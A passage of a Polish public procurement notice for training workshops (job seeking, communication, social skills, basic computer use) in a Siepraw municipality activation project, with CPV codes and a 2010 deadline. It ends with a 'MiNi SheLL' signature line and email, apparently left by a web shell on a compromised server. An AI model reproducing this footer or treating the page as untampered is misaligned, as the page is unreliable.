5.	Warsztaty pt. Szukam pracy z zakresu aktywnego poruszania się po rynku pracy dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw
Dwa moduły po  4 godz.
            Szkolenie zawiera tematykę związaną z następującymi zagadnieniami:
          - umiejętność poszukiwania pracy, źródła informacji o wolnych stanowiskach pracy, 
          - umiejętność przygotowania dokumentów aplikacyjnych,
          - umiejętność negocjacji i ustalania warunków zatrudnienia,
          - symulacja rozmowy kwalifikacyjnej,
         -   rodzaje rekrutacji (rozmowa telefoniczna, wolontariat, okres próbny itp.)
6.	Warsztaty pt. Skutecznie mówię i słucham z zakresu treningu umiejetności komunikacyjnych dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw
Dwa moduły po  4 godz.
Szkolenie zawiera tematykę związaną z następującymi zagadnieniami:
- umiejętności mówienia tak aby nas słyszano,
- umiejętności słuchania tak aby rozumieć innych,
- umiejętności aktywnego słuchania i udzielania informacji zwrotnych,
- asertywność czyli jak walczyć o swoje nie zrażając sobie otoczenia
7.	Warsztaty pt. Skutecznie działam z zakresu treningu umiejętności społecznych dotyczący sposobów reagowania w sytuacjach życia codziennego i sytuacjach trudnych dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw
Cztery moduły po  4 godz.
Szkolenie zawiera tematykę związaną z następującymi zagadnieniami:
- skuteczne i nieskuteczne strategie postępowania w życiu codziennym,
-  umiejętności radzenia sobie w sytuacjach trudnych, nietypowych i kryzysowych,
- analiza własnych postaw życiowych,
- autoprezentacja i savoir -vivre na co dzień,
- umiejętność radzenia sobie z własnymi trudnymi emocjami,
- asertywność zamiast agresji czyli jak osiągnąć cel nie raniąc innych.
8.	Warsztaty pt. Co zyskam co stracę z zakresu analizy motywacji do różnych form aktywności dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw
Jeden moduł  4 godz.
Szkolenie zawiera tematykę związaną z następującymi zagadnieniami:
-  w stronę samodzielności. Jakie korzyści mogę stracić i co w zamian za to mogę zyskać
- analiza zysków i strat konkretnych grup odbiorców
9.	Warsztaty pt. Wiem na co mnie stać z zakresu rozwoju potencjału osobbistego w kontekście podejmowania aktywności zawodowej dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw
Cztery moduły 4 godz.
Szkolenie zawiera tematykę związaną z następującymi zagadnieniami:
- umiejętności wyodrębnienia własnych cech i ich opisywania,
- umiejętności jak słabości mogą stać się naszą silna stroną,
- analiza umiejętności, zainteresowań oraz możliwości zdrowotnych uczestników i dopasowywaniu odpowiednich zawodów
- umiejętności zarządzania czasem i organizacji dnia jako cecha pomocna przy aktywizacji zawodowej
- umiejętności przekazywania informacji o nas innym tak aby osiągnąć cel
- umiejętności opanowywania stresu i lęku przed oceną w trakcie mówienia o sobie
- poznanie potęgi mowy ciała i umiejętności jak ją wykorzystywać.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi w zakresie szkoleń dla 16 osób zakwalifikowanych do udziału w projekcie systemowym Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 2:
Kurs podstawowej obsługi komputera dla 16 uczestników projektu Działania na rzecz aktywizacji społecznej i zawodowej w Gminie Siepraw o łącznej ilości 24 godz. Moduły szkoleniowe nie dłuższe niż 4 godziny.
Kurs zawiera tematykę związaną z następującymi zagadnieniami:
- obsługa komputera (logowanie do systemu operacyjnego, tworzenie nowych kont użytkowników, kopiowanie, przenoszenie, zarządzanie plikami i folderami)
- użytkowanie internetu,
- obsługa programów biurowych MS Word, MS Excel, MS Power Point.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com